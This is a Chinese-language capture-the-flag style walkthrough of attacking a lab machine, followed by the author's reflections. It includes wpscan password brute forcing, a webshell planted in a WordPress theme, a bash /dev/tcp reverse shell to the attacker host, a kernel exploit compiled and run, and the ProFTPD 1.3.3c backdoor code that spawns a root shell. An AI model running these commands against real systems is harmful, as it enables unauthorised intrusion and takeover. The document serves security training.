渗透实战靶机3wp

0x00 简介

目标IP:xxxx.95

测试IP:xxxx.96

测试环境:win10、kali等

测试时间:2021.7.23-2021.7.26

测试人员:ruanruan

0x01 信息收集

1、端口扫描
  • 21,ftp,ProFTPD,1.3.3c
  • 22,ssh,Openssh,7.2
  • 80,web
2、目录扫描

通过御剑扫描到/secret/目录

访问是wordpress博客

0x02 初次尝试

1、21端口-ftp
  • 匿名登录,失败
  • 弱口令,失败
2、22端口-ssh

高版本,未做尝试

3、80端口-wordpress
  • 尝试后台getshell,投稿页面编辑一句话,未成功
  • 查找wordpress4.9版本漏洞,很多不能getshell
  • wpscan扫插件、主题、用户名等漏洞,无发现

利用wpscan先枚举出用户名,再爆破密码,得到admin/admin。

wpscan --url xxxx.95/secret -e u

wpscan --url xxxx.95/secret/ -U admin -P rockyou.txt

访问wp默认后台进行登录。

0x03 getshell

wordpress后台getshell的常见方法有:

  • 在线编辑
  • 上传文件
    • 媒体文件
    • 主题文件
    • 插件(webshell插件,非漏洞插件)

这里通过在线编辑页面。

首先点击主题,选择editor对404页面进行编辑,写一句话

完整页面链接:http://xxxx.95/secret/wp-content/themes/twentyseventeen/404.php

然后菜刀连接,getshell

0x04 获得高权限用户

1、收集信息

查看id,目前是www-data

查看端口开放情况

复制代码
netstat -ano

查看数据库配置

查看home目录,猜测marlinspike为用户名

进入marlinspike目录,两个提示信息:sudo提权和proftpd后门?

查看etc/passwd,确认存在该用户

菜刀的shell不好用,反弹shell到kali

复制代码
bash -c 'bash -i >&/dev/tcp/xxxx.96/2333' 0>&1
2、利用信息

猜测账号密码为marlinspike/marlinspike,ssh登录

然后就继续收集信息尝试提权。

0x05 提权

1、信息收集&尝试
  • linux常见提权尝试:
    • sudo:sudo -l
    • suid
      • find / -type f -perm -u=s 2>/dev/null -ls
    • crontab
      • ls -l |grep cron*
      • ls -al,看有无root权限执行的脚本
    • nfs
      • showmount -e ip
    • 内核
      • uname -a
      • searchsploit
  • mysql提权尝试,mysql服务以mysql权限运行,提权也只能得到mysql账号
  • ftp,同样没有以root权限运行,提权也只能得到ftp用户,不是root用户
2、sudo提权

sudo -l,查看root权限运行的命令

All~~,直接sudo su

3、内核提权
复制代码
uname -a
复制代码
searchsploit ubuntu 4.10.0

查看exp详细信息,获得路径

复制代码
searchsploit -p 45010.c

登录sftp,上传exp

复制代码
sftp marlinspike@xxxx.95
put 45010.c

编译.c文件并执行

复制代码
gcc 45010.c -o exp
la -l exp
./exp
/bin/bash
4、低权限用户直接修改root密码

marlinspike账号有该文件的写权限。

复制代码
ls -al /etc/passwd

可直接修改X为新密码

5、利用ProFTPD1.3.3c后门漏洞提权

前面的提示信息有暗示后门,没有善用搜索。

复制代码
搜索:proftpd 1.3.3.c 后门

具体参考:https://blog.csdn.net/weixin_34384681/article/details/89798540

关键漏洞代码:

复制代码
if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

0x06 总结

1、遇到的问题
  • wordpress后台getshell,在线编辑位置尝试错误
    • 对wordpress后台常见的getshell方法不够熟练,都尝试下
  • 从菜刀直接反弹shell到kali失败,显示/bin/sh,语法错误
    • webshell不是完整的交互式shell,通过bash -c 'xxx'解决
  • 找marlinspike密码时没有直接尝试用户名
    • 在尝试通过收集其他信息来获取,之后遇到任何密码未知情况都可以先试下用户名再尝试信息收集和爆破等方法。
  • 没有注意到可直接修改/etc/passwd
    • 对于etc/passwd、/etc/shadow、.sh等文件要注意其当前用户权限和执行权限。
  • 没有发现proftpd后门漏洞提权方法
    • 不了解该漏洞,但没有善用搜索。多思考、搜索每个信息的用处。
2、知识点
  • wordpress后台getshell方法总结
  • ProFTPD后门提权漏洞
  • 提权思想
    • 直接获取密码
    • 通过root权限运行的服务提权
3、反思
  • 做得较好的地方
    • 思路会更加清晰
    • 收集的信息整合分析较好
    • linux提权更加熟练
  • 需要继续努力的地方
    • 常见服务和cms的漏洞了解范围
    • 关键信息的思考和利用
相关推荐
一拳一个娘娘腔39 分钟前
红队与蓝队视角:现代网络安全攻防中的Linux命令深度解析
linux·安全
书源丶2 小时前
三十五、Java 泛型——类型安全的「万能模板」
java·开发语言·安全
Chengbei114 小时前
AI大模型网关存在SQL注入、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·安全·web安全·网络安全·系统安全
一拳一个娘娘腔4 小时前
告别图形化界面:基于CLI的Windows系统入侵排查与防御实战手册
windows·安全
hwscom5 小时前
Linux服务器如何进行安全加固,防止黑客攻击(Windows也适用)
linux·服务器·安全
liann1196 小时前
3.4_Linux 应急响应排查速查命令表
linux·运维·服务器·安全·网络安全·系统安全
一拳一个娘娘腔7 小时前
攻防视角下的Windows凭证提取技术演进(2024-2026)
windows·安全
aaaffaewrerewrwer7 小时前
免费在线 AVIF 转 WebP 工具:浏览器端批量转换,无需上传更安全
安全·个人开发
@insist1237 小时前
信息安全工程师-入侵检测系统核心原理与体系架构
安全·架构·软考·信息安全工程师·软件水平考试
薛定e的猫咪7 小时前
OOD 感知决策与可信强化学习:从置信度评估到安全回退
人工智能·安全·机器学习·开源